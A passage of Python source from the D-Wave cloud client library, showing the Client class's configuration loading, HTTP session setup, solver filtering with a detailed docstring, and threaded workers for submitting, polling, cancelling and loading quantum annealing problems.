config_file=config_file, profile=profile, client=client,
endpoint=endpoint, token=token, solver=solver, proxy=proxy,
headers=headers)
logger.debug("Config loaded: %r", config)
# fallback to legacy `.dwrc` if key variables missing
if legacy_config_fallback:
warnings.warn("'legacy_config_fallback' is deprecated, please convert "
"your legacy .dwrc file to the new config format.", DeprecationWarning)
if not config.get('token'):
config = legacy_load_config(
profile=profile, client=client, endpoint=endpoint,
token=token, solver=solver, proxy=proxy, headers=headers)
logger.debug("Legacy config loaded: %r", config)
# manual override of other (client-custom) arguments
config.update(kwargs)
from dwave.cloud import qpu, sw
_clients = {'qpu': qpu.Client, 'sw': sw.Client, 'base': cls}
_client = config.pop('client', None) or 'base'
logger.debug("Final config used for %s.Client(): %r", _client, config)
return _clients[_client](**config)
def __init__(self, endpoint=None, token=None, solver=None, proxy=None,
permissive_ssl=False, request_timeout=60, polling_timeout=None,
connection_close=False, headers=None, **kwargs):
"""To setup the connection a pipeline of queues/workers is constructed.
There are five interactions with the server the connection manages:
1. Downloading solver information.
2. Submitting problem data.
3. Polling problem status.
4. Downloading problem results.
5. Canceling problems
Loading solver information is done synchronously. The other four tasks
are performed by asynchronously workers. For 2, 3, and 5 the workers
gather tasks in batches.
"""
if not endpoint:
endpoint = self.DEFAULT_API_ENDPOINT
if not token:
raise ValueError("API token not defined")
logger.debug(
"Creating a client for (endpoint=%r, token=%r, solver=%r, proxy=%r, "
"permissive_ssl=%r, request_timeout=%r, polling_timeout=%r, "
"connection_close=%r, headers=%r, **kwargs=%r)",
endpoint, token, solver, proxy,
permissive_ssl, request_timeout, polling_timeout,
connection_close, headers, kwargs
)
# parse solver
if not solver:
solver_def = {}
elif isinstance(solver, collections.Mapping):
solver_def = solver
elif isinstance(solver, six.string_types):
# support features dict encoded as JSON in our config INI file
# TODO: push this decoding to the config module, once we switch to a
# richer config format (JSON or YAML)
try:
solver_def = json.loads(solver)
except Exception:
# unparseable json, assume string name for solver
# we'll deprecate this eventually, but for now just convert it to
# features dict (equality constraint on full solver name)
logger.debug("Invalid solver JSON, assuming string name: %r", solver)
solver_def = dict(name__eq=solver)
else:
raise ValueError("Expecting a features dictionary or a string name for 'solver'")
logger.debug("Parsed solver=%r", solver_def)
# parse headers
if not headers:
headers_dict = {}
elif isinstance(headers, collections.Mapping):
headers_dict = headers
elif isinstance(headers, six.string_types):
try:
# valid headers = "Field-1: value-1\nField-2: value-2"
headers_dict = {key.strip(): val.strip()
for key, val in [line.split(':')
for line in headers.strip().split('\n')]}
except Exception as e:
logger.debug("Invalid headers: %r", headers)
headers_dict = {}
else:
raise ValueError("HTTP headers expected in a dict, or a string")
logger.debug("Parsed headers=%r", headers_dict)
# Store connection/session parameters
self.endpoint = endpoint
self.default_solver = solver_def
self.token = token
self.request_timeout = parse_float(request_timeout)
self.polling_timeout = parse_float(polling_timeout)
self.proxy = proxy
self.headers = headers_dict
self.permissive_ssl = permissive_ssl
self.connection_close = connection_close
# Create session for main thread only
self.session = self.create_session()
# Build the problem submission queue, start its workers
self._submission_queue = queue.Queue()
self._submission_workers = []
for _ in range(self._SUBMISSION_THREAD_COUNT):
worker = threading.Thread(target=self._do_submit_problems)
worker.daemon = True
worker.start()
self._submission_workers.append(worker)
# Build the cancel problem queue, start its workers
self._cancel_queue = queue.Queue()
self._cancel_workers = []
for _ in range(self._CANCEL_THREAD_COUNT):
worker = threading.Thread(target=self._do_cancel_problems)
worker.daemon = True
worker.start()
self._cancel_workers.append(worker)
# Build the problem status polling queue, start its workers
self._poll_queue = queue.PriorityQueue()
self._poll_workers = []
for _ in range(self._POLL_THREAD_COUNT):
worker = threading.Thread(target=self._do_poll_problems)
worker.daemon = True
worker.start()
self._poll_workers.append(worker)
# Build the result loading queue, start its workers
self._load_queue = queue.Queue()
self._load_workers = []
for _ in range(self._LOAD_THREAD_COUNT):
worker = threading.Thread(target=self._do_load_results)
worker.daemon = True
worker.start()
self._load_workers.append(worker)
# Setup multipart upload executors
self._upload_problem_executor = \
ThreadPoolExecutor(self._UPLOAD_PROBLEM_THREAD_COUNT)
self._upload_part_executor = \
PriorityThreadPoolExecutor(self._UPLOAD_PART_THREAD_COUNT)
def create_session(self):
"""Create a new requests session based on client's (self) params.
Note: since `requests.Session` is NOT thread-safe, every thread should
create and use an isolated session.
"""
# allow endpoint path to not end with /
endpoint = self.endpoint
if not endpoint.endswith('/'):
endpoint += '/'
session = BaseUrlSession(base_url=endpoint)
session.mount('http://', TimeoutingHTTPAdapter(timeout=self.request_timeout))
session.mount('https://', TimeoutingHTTPAdapter(timeout=self.request_timeout))
if self.headers:
session.headers.update(self.headers)
session.headers.update({'X-Auth-Token': self.token,
'User-Agent': user_agent(__packagename__, __version__)})
session.proxies = {'http': self.proxy, 'https': self.proxy}
if self.permissive_ssl:
session.verify = False
if self.connection_close:
session.headers.update({'Connection': 'close'})
# Debug-log headers
logger.debug("create_session(session.headers=%r)", session.headers)
return session
def close(self):
"""Perform a clean shutdown.
Waits for all the currently scheduled work to finish, kills the workers,
and closes the connection pool.
.. note:: Ensure your code does not submit new work while the connection is closing.
Where possible, it is recommended you use a context manager (a :code:`with Client.from_config(...) as`
construct) to ensure your code properly closes all resources.
Examples:
This example creates a client (based on an auto-detected configuration file), executes
some code (represented by a placeholder comment), and then closes the client.
>>> from dwave.cloud import Client
>>> client = Client.from_config()
>>> # code that uses client
>>> client.close()
"""
# Finish all the work that requires the connection
logger.debug("Joining submission queue")
self._submission_queue.join()
logger.debug("Joining cancel queue")
self._cancel_queue.join()
logger.debug("Joining poll queue")
self._poll_queue.join()
logger.debug("Joining load queue")
self._load_queue.join()
logger.debug("Shutting down problem upload executor")
self._upload_problem_executor.shutdown()
logger.debug("Shutting down problem part upload executor")
self._upload_part_executor.shutdown()
# Send kill-task to all worker threads
# Note: threads can't be 'killed' in Python, they have to die by
# natural causes
for _ in self._submission_workers:
self._submission_queue.put(None)
for _ in self._cancel_workers:
self._cancel_queue.put(None)
for _ in self._poll_workers:
self._poll_queue.put((-1, None))
for _ in self._load_workers:
self._load_queue.put(None)
# Wait for threads to die
for worker in chain(self._submission_workers, self._cancel_workers,
self._poll_workers, self._load_workers):
worker.join()
# Close the main thread's session
self.session.close()
def __enter__(self):
"""Let connections be used in with blocks."""
return self
def __exit__(self, *args):
"""At the end of a with block perform a clean shutdown of the connection."""
self.close()
return False
@staticmethod
def is_solver_handled(solver):
"""Determine if the specified solver should be handled by this client.
Default implementation accepts all solvers (always returns True). Override this
predicate function with a subclass if you want to specialize your client for a
particular type of solvers.
Examples:
This function accepts only solvers named "My_Solver_*".
.. code:: python
@staticmethod
def is_solver_handled(solver):
return solver and solver.id.startswith('My_Solver_')
"""
return True
@cached(maxage=_SOLVERS_CACHE_MAXAGE)
def _fetch_solvers(self, name=None):
if name is not None:
logger.info("Fetching definition of a solver with name=%r", name)
url = 'solvers/remote/{}/'.format(name)
else:
logger.info("Fetching definitions of all available solvers")
url = 'solvers/remote/'
try:
response = self.session.get(url)
except requests.exceptions.Timeout:
raise RequestTimeout
if response.status_code == 401:
raise SolverAuthenticationError
if name is not None and response.status_code == 404:
raise SolverNotFoundError("No solver with name={!r} available".format(name))
response.raise_for_status()
data = response.json()
if name is not None:
data = [data]
logger.debug("Received solver data for %d solver(s).", len(data))
logger.trace("Solver data received for solver name=%r: %r", name, data)
solvers = []
for solver_desc in data:
for solver_class in available_solvers:
try:
logger.debug("Trying to instantiate %r", solver_class.__name__)
solver = solver_class(self, solver_desc)
if self.is_solver_handled(solver):
solvers.append(solver)
logger.info("Adding solver %r", solver)
break
else:
logger.debug("Skipping solver %r (not handled by this client)", solver)
except UnsupportedSolverError as e:
logger.debug("Skipping solver due to %r", e)
# propagate all other/decoding errors, like InvalidAPIResponseError, etc.
return solvers
def get_solvers(self, refresh=False, order_by='avg_load', **filters):
"""Return a filtered list of solvers handled by this client.
Args:
refresh (bool, default=False):
Force refresh of cached list of solvers/properties.
order_by (callable/str/None, default='avg_load'):
Solver sorting key function (or :class:`Solver` attribute/item
dot-separated path). By default, solvers are sorted by average
load. To explicitly not sort the solvers (and use the API-returned
order), set ``order_by=None``.
Signature of the `key` `callable` is::
key :: (Solver s, Ord k) => s -> k
Basic structure of the `key` string path is::
"-"? (attr|item) ( "." (attr|item) )*
For example, to use solver property named ``max_anneal_schedule_points``,
available in ``Solver.properties`` dict, you can either specify a
callable `key`::
key=lambda solver: solver.properties['max_anneal_schedule_points']
or, you can use a short string path based key::
key='properties.max_anneal_schedule_points'
Solver derived properties, available as :class:`Solver` properties
can also be used (e.g. ``num_active_qubits``, ``online``,
``avg_load``, etc).
Ascending sort order is implied, unless the key string path does
not start with ``-``, in which case descending sort is used.
Note: the sort used for ordering solvers by `key` is **stable**,
meaning that if multiple solvers have the same value for the
key, their relative order is preserved, and effectively they are
in the same order as returned by the API.
Note: solvers with ``None`` for key appear last in the list of
solvers. When providing a key callable, ensure all values returned
are of the same type (particularly in Python 3). For solvers with
undefined key value, return ``None``.
**filters:
See `Filtering forms` and `Operators` below.
Solver filters are defined, similarly to Django QuerySet filters, with
keyword arguments of form `<key1>__...__<keyN>[__<operator>]=<value>`.
Each `<operator>` is a predicate (boolean) function that acts on two
arguments: value of feature `<name>` (described with keys path
`<key1.key2...keyN>`) and the required `<value>`.
Feature `<name>` can be:
1) a derived solver property, available as an identically named
:class:`Solver`'s property (`name`, `qpu`, `software`, `online`,
`num_active_qubits`, `avg_load`)
2) a solver parameter, available in :obj:`Solver.parameters`
3) a solver property, available in :obj:`Solver.properties`
4) a path describing a property in nested dictionaries
Filtering forms are:
* <derived_property>__<operator> (object <value>)
* <derived_property> (bool)
This form ensures the value of solver's property bound to `derived_property`,
after applying `operator` equals the `value`. The default operator is `eq`.
For example::
>>> client.get_solvers(avg_load__gt=0.5)
but also::
>>> client.get_solvers(online=True)
>>> # identical to:
>>> client.get_solvers(online__eq=True)
* <parameter>__<operator> (object <value>)
* <parameter> (bool)
This form ensures that the solver supports `parameter`. General operator form can
be used but usually does not make sense for parameters, since values are human-readable
descriptions. The default operator is `available`.
Example::
>>> client.get_solvers(flux_biases=True)
>>> # identical to:
>>> client.get_solvers(flux_biases__available=True)
* <property>__<operator> (object <value>)
* <property> (bool)
This form ensures the value of the solver's `property`, after applying `operator`
equals the righthand side `value`. The default operator is `eq`.
Note: if a non-existing parameter/property name/key given, the default operator is `eq`.
Operators are:
* `available` (<name>: str, <value>: bool):
Test availability of <name> feature.
* `eq`, `lt`, `lte`, `gt`, `gte` (<name>: str, <value>: any):
Standard relational operators that compare feature <name> value with <value>.
* `regex` (<name>: str, <value>: str):
Test regular expression matching feature value.
* `covers` (<name>: str, <value>: single value or range expressed as 2-tuple/list):
Test feature <name> value (which should be a *range*) covers a given value or a subrange.
* `within` (<name>: str, <value>: range expressed as 2-tuple/list):
Test feature <name> value (which can be a *single value* or a *range*) is within a given range.
* `in` (<name>: str, <value>: container type):
Test feature <name> value is *in* <value> container.
* `contains` (<name>: str, <value>: any):
Test feature <name> value (container type) *contains* <value>.
* `issubset` (<name>: str, <value>: container type):
Test feature <name> value (container type) is a subset of <value>.
* `issuperset` (<name>: str, <value>: container type):
Test feature <name> value (container type) is a superset of <value>.
Derived properies are:
* `name` (str): Solver name/id.
* `qpu` (bool): Is solver QPU based?
* `software` (bool): Is solver software based?
* `online` (bool, default=True): Is solver online?
* `num_active_qubits` (int): Number of active qubits. Less then or equal to `num_qubits`.
* `avg_load` (float): Solver's average load (similar to Unix load average).
Common solver parameters are:
* `flux_biases`: Should solver accept flux biases?
* `anneal_schedule`: Should solver accept anneal schedule?
Common solver properties are:
* `num_qubits` (int): Number of qubits available.
* `vfyc` (bool): Should solver work on "virtual full-yield chip"?
* `max_anneal_schedule_points` (int): Piecewise linear annealing schedule points.
* `h_range` ([int,int]), j_range ([int,int]): Biases/couplings values range.
* `num_reads_range` ([int,int]): Range of allowed values for `num_reads` parameter.
Returns:
list[Solver]: List of all solvers that satisfy the conditions.
Note:
Client subclasses (e.g. :class:`dwave.cloud.qpu.Client` or
:class:`dwave.cloud.sw.Client`) already filter solvers by resource
type, so for `qpu` and `software` filters to have effect, call :meth:`.get_solvers`
on base class :class:`~dwave.cloud.client.Client`.
Examples::
client.get_solvers(
num_qubits__gt=2000, # we need more than 2000 qubits
num_qubits__lt=4000, # ... but fewer than 4000 qubits
num_qubits__within=(2000, 4000), # an alternative to the previous two lines
num_active_qubits=1089, # we want a particular number of active qubits
vfyc=True, # we require a fully yielded Chimera
vfyc__in=[False, None], # inverse of the previous filter
vfyc__available=False, # we want solvers that do not advertize the vfyc property
anneal_schedule=True, # we need support for custom anneal schedule
max_anneal_schedule_points__gte=4, # we need at least 4 points for our anneal schedule
num_reads_range__covers=1000, # our solver must support returning 1000 reads
extended_j_range__covers=[-2, 2], # we need extended J range to contain subrange [-2,2]
couplers__contains=[0, 128], # coupler (edge between) qubits (0,128) must exist
couplers__issuperset=[[0,128], [0,4]],
# two couplers required: (0,128) and (0,4)
qubits__issuperset={0, 4, 215}, # qubits 0, 4 and 215 must exist
supported_problem_types__issubset={'ising', 'qubo'},
# require Ising, QUBO or both to be supported
name='DW_2000Q_5', # full solver name/ID match
name__regex='.*2000.*', # partial/regex-based solver name match
chip_id__regex='DW_.*', # chip ID prefix must be DW_
topology__type__eq="chimera" # topology.type must be chimera
)
"""
def covers_op(prop, val):
"""Does LHS `prop` (range) fully cover RHS `val` (range or item)?"""
# `prop` must be a 2-element list/tuple range.
if not isinstance(prop, (list, tuple)) or not len(prop) == 2:
raise ValueError("2-element list/tuple range required for LHS value")
llo, lhi = min(prop), max(prop)
# `val` can be a single value, or a range (2-list/2-tuple).
if isinstance(val, (list, tuple)) and len(val) == 2:
# val range within prop range?
rlo, rhi = min(val), max(val)
return llo <= rlo and lhi >= rhi
else:
# val item within prop range?
return llo <= val <= lhi
def within_op(prop, val):
"""Is LHS `prop` (range or item) fully covered by RHS `val` (range)?"""
try:
return covers_op(val, prop)
except ValueError:
raise ValueError("2-element list/tuple range required for RHS value")
def _set(iterable):
"""Like set(iterable), but works for lists as items in iterable.
Before constructing a set, lists are converted to tuples.
"""
first = next(iter(iterable))
if isinstance(first, list):
return set(tuple(x) for x in iterable)
return set(iterable)
def with_valid_lhs(op):
@wraps(op)
def _wrapper(prop, val):
if prop is None:
return False
return op(prop, val)
return _wrapper
# available filtering operators
ops = {
'lt': with_valid_lhs(operator.lt),
'lte': with_valid_lhs(operator.le),
'gt': with_valid_lhs(operator.gt),
'gte': with_valid_lhs(operator.ge),
'eq': operator.eq,
'available': lambda prop, val: prop is not None if val else prop is None,
'regex': with_valid_lhs(lambda prop, val: re.match("^{}$".format(val), prop)),
# range operations
'covers': with_valid_lhs(covers_op),
'within': with_valid_lhs(within_op),
# membership tests
'in': lambda prop, val: prop in val,
'contains': with_valid_lhs(lambda prop, val: val in prop),
# set tests
'issubset': with_valid_lhs(lambda prop, val: _set(prop).issubset(_set(val))),
'issuperset': with_valid_lhs(lambda prop, val: _set(prop).issuperset(_set(val))),
}
def predicate(solver, query, val):
# needs to handle kwargs like these:
# key=val
# key__op=val
# key__key=val
# key__key__op=val
# LHS is split on __ in `query`
assert len(query) >= 1
potential_path, potential_op_name = query[:-1], query[-1]
if potential_op_name in ops:
# op is explicit, and potential path is correct
op_name = potential_op_name
else:
# op is implied and depends on property type, path is the whole query
op_name = None
potential_path = query
path = '.'.join(potential_path)
if path in solver.derived_properties:
op = ops[op_name or 'eq']
return op(getattr(solver, path), val)
elif pluck(solver.parameters, path, None) is not None:
op = ops[op_name or 'available']
return op(pluck(solver.parameters, path), val)
elif pluck(solver.properties, path, None) is not None:
op = ops[op_name or 'eq']
return op(pluck(solver.properties, path), val)
else:
op = ops[op_name or 'eq']
return op(None, val)
# param validation
sort_reverse = False
if not order_by:
sort_key = None
elif isinstance(order_by, six.string_types):
if order_by[0] == '-':
sort_reverse = True
order_by = order_by[1:]
if not order_by:
sort_key = None
else:
sort_key = lambda solver: pluck(solver, order_by, None)
elif callable(order_by):
sort_key = order_by
else:
raise TypeError("expected string or callable for 'order_by'")
# default filters:
filters.setdefault('online', True)
predicates = []
for lhs, val in filters.items():
query = lhs.split('__')
predicates.append(partial(predicate, query=query, val=val))
logger.debug("Filtering solvers with predicates=%r", predicates)
# optimization for case when exact solver name/id is known:
# we can fetch only that solver
# NOTE: in future, complete feature-based filtering will be on server-side
query = dict(refresh_=refresh)
if 'name' in filters:
query['name'] = filters['name']
if 'name__eq' in filters:
query['name'] = filters['name__eq']
# filter
solvers = self._fetch_solvers(**query)
solvers = [s for s in solvers if all(p(s) for p in predicates)]
# sort: undefined (None) key values go last
if sort_key is not None:
solvers_with_keys = [(sort_key(solver), solver) for solver in solvers]
solvers_with_invalid_keys = [(key, solver) for key, solver in solvers_with_keys if key is None]
solvers_with_valid_keys = [(key, solver) for key, solver in solvers_with_keys if key is not None]
solvers_with_valid_keys.sort(key=operator.itemgetter(0))
solvers = [solver for key, solver in chain(solvers_with_valid_keys, solvers_with_invalid_keys)]
# reverse if necessary (as a separate step from sorting, so it works for invalid keys
# and plain list reverse without sorting)
if sort_reverse:
solvers.reverse()
return solvers
def solvers(self, refresh=False, **filters):
"""Deprecated in favor of :meth:`.get_solvers`."""
warnings.warn("'solvers' is deprecated in favor of 'get_solvers'.", DeprecationWarning)
return self.get_solvers(refresh=refresh, **filters)
def get_solver(self, name=None, refresh=False, **filters):
"""Load the configuration for a single solver.
Makes a blocking web call to `{endpoint}/solvers/remote/{solver_name}/`, where `{endpoint}`
is a URL configured for the client, and returns a :class:`.Solver` instance
that can be used to submit sampling problems to the D-Wave API and retrieve results.
Args:
name (str):
ID of the requested solver. ``None`` returns the default solver.
If default solver is not configured, ``None`` returns the first available
solver in ``Client``'s class (QPU/software/base).
**filters (keyword arguments, optional):
Dictionary of filters over features this solver has to have. For a list of
feature names and values, see: :meth:`~dwave.cloud.client.Client.get_solvers`.
order_by (callable/str, default='id'):
Solver sorting key function (or :class:`Solver` attribute name).
By default, solvers are sorted by ID/name.
refresh (bool):
Return solver from cache (if cached with ``get_solvers()``),
unless set to ``True``.
Returns:
:class:`.Solver`
Examples:
This example creates two solvers for a client instantiated from
a local system's auto-detected default configuration file, which configures
a connection to a D-Wave resource that provides two solvers. The first
uses the default solver, the second explicitly selects another solver.
>>> from dwave.cloud import Client
>>> client = Client.from_config()
>>> client.get_solvers() # doctest: +SKIP
[Solver(id='2000Q_ONLINE_SOLVER1'), Solver(id='2000Q_ONLINE_SOLVER2')]
>>> solver1 = client.get_solver() # doctest: +SKIP
>>> solver2 = client.get_solver(name='2000Q_ONLINE_SOLVER2') # doctest: +SKIP
>>> solver1.id # doctest: +SKIP
'2000Q_ONLINE_SOLVER1'
>>> solver2.id # doctest: +SKIP
'2000Q_ONLINE_SOLVER2'
>>> # code that uses client
>>> client.close() # doctest: +SKIP
"""
logger.debug("Requested a solver that best matches feature filters=%r", filters)
# backward compatibility: name as the first feature
if name is not None:
filters.setdefault('name', name)
# in absence of other filters, config/env solver filters/name are used
if not filters and self.default_solver:
filters = self.default_solver
# get the first solver that satisfies all filters
try:
logger.debug("Fetching solvers according to filters=%r", filters)
return self.get_solvers(refresh=refresh, **filters)[0]
except IndexError:
raise SolverNotFoundError("Solver with the requested features not available")
def _submit(self, body, future):
"""Enqueue a problem for submission to the server.
This method is thread safe.
"""
self._submission_queue.put(self._submit.Message(body, future))
_submit.Message = collections.namedtuple('Message', ['body', 'future'])
def _do_submit_problems(self):
"""Pull problems from the submission queue and submit them.
Note:
This method is always run inside of a daemon thread.
"""
session = self.create_session()
try:
while True:
# Pull as many problems as we can, block on the first one,
# but once we have one problem, switch to non-blocking then
# submit without blocking again.
# `None` task is used to signal thread termination
item = self._submission_queue.get()
if item is None:
break
ready_problems = [item]
while len(ready_problems) < self._SUBMIT_BATCH_SIZE:
try:
ready_problems.append(self._submission_queue.get_nowait())
except queue.Empty:
break
# Submit the problems
logger.debug("Submitting %d problems", len(ready_problems))
body = '[' + ','.join(mess.body for mess in ready_problems) + ']'
try:
try:
response = session.post('problems/', body)
localtime_of_response = epochnow()
except requests.exceptions.Timeout:
raise RequestTimeout
if response.status_code == 401:
raise SolverAuthenticationError()
response.raise_for_status()
message = response.json()
logger.debug("Finished submitting %d problems", len(ready_problems))
except BaseException as exception:
logger.debug("Submit failed for %d problems", len(ready_problems))
if not isinstance(exception, SolverAuthenticationError):
exception = IOError(exception)
for mess in ready_problems:
mess.future._set_error(exception, sys.exc_info())
self._submission_queue.task_done()
continue
# Pass on the information
for submission, res in zip(ready_problems, message):
submission.future._set_clock_diff(response, localtime_of_response)
self._handle_problem_status(res, submission.future)
self._submission_queue.task_done()
# this is equivalent to a yield to scheduler in other threading libraries
time.sleep(0)
except BaseException as err:
logger.exception(err)
finally:
session.close()
def _handle_problem_status(self, message, future):
"""Handle the results of a problem submission or results request.
This method checks the status of the problem and puts it in the correct
queue.
Args:
message (dict):
Update message from the SAPI server wrt. this problem.
future (:class:`dwave.cloud.computation.Future`:
future corresponding to the problem
Note:
This method is always run inside of a daemon thread.
"""
try:
logger.trace("Handling response: %r", message)
logger.debug("Handling response for %s with status %s",
message.get('id'), message.get('status'))
# Handle errors in batch mode
if 'error_code' in message and 'error_msg' in message:
raise SolverFailureError(message['error_msg'])
if 'status' not in message:
raise InvalidAPIResponseError("'status' missing in problem description response")
if 'id' not in message:
raise InvalidAPIResponseError("'id' missing in problem description response")
future.id = message['id']
future.remote_status = status = message['status']
# The future may not have the ID set yet
with future._single_cancel_lock:
# This handles the case where cancel has been called on a future
# before that future received the problem id
if future._cancel_requested:
if not future._cancel_sent and status == self.STATUS_PENDING:
# The problem has been canceled but the status says its still in queue
# try to cancel it
self._cancel(message['id'], future)
# If a cancel request could meaningfully be sent it has been now
future._cancel_sent = True
if not future.time_received and message.get('submitted_on'):
future.time_received = parse_datetime(message['submitted_on'])
if not future.time_solved and message.get('solved_on'):
future.time_solved = parse_datetime(message['solved_on'])
if not future.eta_min and message.get('earliest_estimated_completion'):
future.eta_min = parse_datetime(message['earliest_estimated_completion'])
if not future.eta_max and message.get('latest_estimated_completion'):
future.eta_max = parse_datetime(message['latest_estimated_completion'])
if status == self.STATUS_COMPLETE:
# TODO: find a better way to differentiate between
# `completed-on-submit` and `completed-on-poll`.
# Loading should happen only once, not every time when response
# doesn't contain 'answer'.
# If the message is complete, forward it to the future object
if 'answer' in message:
future._set_message(message)
# If the problem is complete, but we don't have the result data
# put the problem in the queue for loading results.
else:
self._load(future)
elif status in self.ANY_STATUS_ONGOING:
# If the response is pending add it to the queue.
self._poll(future)
elif status == self.STATUS_CANCELLED:
# If canceled return error
raise CanceledFutureError()
else:
# Return an error to the future object
errmsg = message.get('error_message', 'An unknown error has occurred.')
if 'solver is offline' in errmsg.lower():
raise SolverOfflineError(errmsg)
else:
raise SolverFailureError(errmsg)
except Exception as error:
# If there were any unhandled errors we need to release the
# lock in the future, otherwise deadlock occurs.
future._set_error(error, sys.exc_info())
def _cancel(self, id_, future):
"""Enqueue a problem to be canceled.
This method is thread safe.
"""
self._cancel_queue.put((id_, future))
def _do_cancel_problems(self):
"""Pull ids from the cancel queue and submit them.
Note:
This method is always run inside of a daemon thread.
"""
session = self.create_session()
try:
while True:
# Pull as many problems as we can, block when none are available.
# `None` task is used to signal thread termination
item = self._cancel_queue.get()
if item is None:
break
item_list = [item]
while True:
try:
item_list.append(self._cancel_queue.get_nowait())
except queue.Empty:
break
# Submit the problems, attach the ids as a json list in the
# body of the delete query.
try:
body = [item[0] for item in item_list]
try:
session.delete('problems/', json=body)
except requests.exceptions.Timeout:
raise RequestTimeout
except Exception as err:
for _, future in item_list:
if future is not None:
future._set_error(err, sys.exc_info())
# Mark all the ids as processed regardless of success or failure.
[self._cancel_queue.task_done() for _ in item_list]
# this is equivalent to a yield to scheduler in other threading libraries
time.sleep(0)
except Exception as err:
logger.exception(err)
finally:
session.close()
def _is_clock_diff_acceptable(self, future):
if not future or future.clock_diff is None:
return False
logger.debug("Detected (server,client) clock offset: approx. %.2f sec. "
"Acceptable offset is: %.2f sec",
future.clock_diff, self._CLOCK_DIFF_MAX)
return future.clock_diff <= self._CLOCK_DIFF_MAX
def _poll(self, future):
"""Enqueue a problem to poll the server for status."""
if future._poll_backoff is None:
# on first poll, start with minimal back-off
future._poll_backoff = self._POLL_BACKOFF_MIN
else:
# on subsequent polls, do exponential back-off, clipped to a range
future._poll_backoff = \
max(self._POLL_BACKOFF_MIN,
min(future._poll_backoff * 2, self._POLL_BACKOFF_MAX))
# for poll priority we use timestamp of next scheduled poll
at = time.time() + future._poll_backoff
now = utcnow()
future_age = (now - future.time_created).total_seconds()
logger.debug("Polling scheduled at %.2f with %.2f sec new back-off for: %s (future's age: %.2f sec)",
at, future._poll_backoff, future.id, future_age)
# don't enqueue for next poll if polling_timeout is exceeded by then
future_age_on_next_poll = future_age + (at - datetime_to_timestamp(now))
if self.polling_timeout is not None and future_age_on_next_poll > self.polling_timeout:
logger.debug("Polling timeout exceeded before next poll: %.2f sec > %.2f sec, aborting polling!",
future_age_on_next_poll, self.polling_timeout)
raise PollingTimeout
self._poll_queue.put((at, future))
def _do_poll_problems(self):
"""Poll the server for the status of a set of problems.
Note:
This method is always run inside of a daemon thread.
"""
session = self.create_session()
try:
# grouped futures (all scheduled within _POLL_GROUP_TIMEFRAME)
frame_futures = {}
def task_done():
self._poll_queue.task_done()
def add(future):
# add future to query frame_futures
# returns: worker lives on?
# `None` task signifies thread termination
if future is None:
task_done()
return False
if future.id not in frame_futures and not future.done():
frame_futures[future.id] = future
else:
task_done()
return True
while True:
frame_futures.clear()
# blocking add first scheduled
frame_earliest, future = self._poll_queue.get()
if not add(future):
return
# try grouping if scheduled within grouping timeframe
while len(frame_futures) < self._STATUS_QUERY_SIZE:
try:
task = self._poll_queue.get_nowait()
except queue.Empty:
break
at, future = task
if at - frame_earliest <= self._POLL_GROUP_TIMEFRAME:
if not add(future):
return
else:
task_done()
self._poll_queue.put(task)
break
# build a query string with ids of all futures in this frame
ids = [future.id for future in frame_futures.values()]
logger.debug("Polling for status of futures: %s", ids)
query_string = 'problems/?id=' + ','.join(ids)
# if futures were cancelled while `add`ing, skip empty frame
if not ids:
continue
# wait until `frame_earliest` before polling
delay = frame_earliest - time.time()
if delay > 0:
logger.debug("Pausing polling %.2f sec for futures: %s", delay, ids)
time.sleep(delay)
else:
logger.trace("Skipping non-positive delay of %.2f sec", delay)
# execute and handle the polling request
try:
logger.trace("Executing poll API request")
try:
response = session.get(query_string)
except requests.exceptions.Timeout:
raise RequestTimeout
if response.status_code == 401:
raise SolverAuthenticationError()
# assume 5xx errors are transient, and don't abort polling
if 500 <= response.status_code < 600:
logger.warning(
"Received an internal server error response on "
"problem status polling request (%s). Assuming "
"error is transient, and resuming polling.",
response.status_code)
# add all futures in this frame back to the polling queue
# XXX: logic split between `_handle_problem_status` and here
for future in frame_futures.values():
self._poll(future)
else:
# otherwise, fail
response.raise_for_status()
# or handle a successful request
statuses = response.json()
for status in statuses:
self._handle_problem_status(status, frame_futures[status['id']])
except BaseException as exception:
if not isinstance(exception, SolverAuthenticationError):
exception = IOError(exception)
for id_ in frame_futures.keys():
frame_futures[id_]._set_error(IOError(exception), sys.exc_info())
for id_ in frame_futures.keys():
task_done()
time.sleep(0)
except Exception as err:
logger.exception(err)
finally:
session.close()
def _load(self, future):
"""Enqueue a problem to download results from the server.
Args:
future (:class:`~dwave.cloud.computation.Future`):
Future object corresponding to the remote computation.
This method is thread-safe.
"""
self._load_queue.put(future)
def _do_load_results(self):
"""Submit a query asking for the results for a particular problem.
To request the results of a problem: ``GET /problems/{problem_id}/``
Note:
This method is always run inside of a daemon thread.
"""
session = self.create_session()
try:
while True:
# Select a problem
future = self._load_queue.get()
# `None` task signifies thread termination
if future is None:
break
logger.debug("Loading results of: %s", future.id)
# Submit the query
query_string = 'problems/{}/'.format(future.id)
try:
try:
response = session.get(query_string)
except requests.exceptions.Timeout:
raise RequestTimeout
if response.status_code == 401:
raise SolverAuthenticationError()
response.raise_for_status()
message = response.json()
except BaseException as exception:
if not isinstance(exception, SolverAuthenticationError):
exception = IOError(exception)
future._set_error(IOError(exception), sys.exc_info())
continue
# Dispatch the results, mark the task complete
self._handle_problem_status(message, future)
self._load_queue.task_done()
# this is equivalent to a yield to scheduler in other threading libraries
time.sleep(0)
except Exception as err:
logger.error('Load result error: ' + str(err))
finally:
session.close()
def upload_problem_encoded(self, problem, problem_id=None):
"""Initiate multipart problem upload, returning the Problem ID in a
:class:`~concurrent.futures.Future`.
Args:
problem (bytes-like/file-like):
Encoded problem data to upload.
problem_id (str, optional):
Problem ID. If provided, problem will be re-uploaded. Previously
uploaded parts, with a matching checksum, are skipped.
Returns:
:class:`concurrent.futures.Future`[str]:
Problem ID in a Future. Problem ID can be used to submit
problems by reference.
Note:
For a higher-level interface, use upload/submit solver methods.
"""
return self._upload_problem_executor.submit(
self._upload_problem_worker, problem=problem, problem_id=problem_id)
@staticmethod
@retried(_UPLOAD_REQUEST_RETRIES, backoff=_UPLOAD_RETRIES_BACKOFF)
def _initiate_multipart_upload(session, size):
"""Sync http request using `session`."""
logger.debug("Initiating problem multipart upload (size=%r)", size)
path = 'bqm/multipart'
body = dict(size=size)
logger.trace("session.post(path=%r, json=%r)", path, body)
try:
response = session.post(path, json=body)
except requests.exceptions.Timeout:
raise RequestTimeout
if response.status_code == 401:
raise SolverAuthenticationError()
else:
logger.trace("Multipart upload initiate response: %r", response.text)
response.raise_for_status()
try:
problem_id = response.json()['id']
except KeyError:
raise InvalidAPIResponseError("problem ID missing")
logger.debug("Multipart upload initiated (problem_id=%r)", problem_id)
return problem_id
@staticmethod
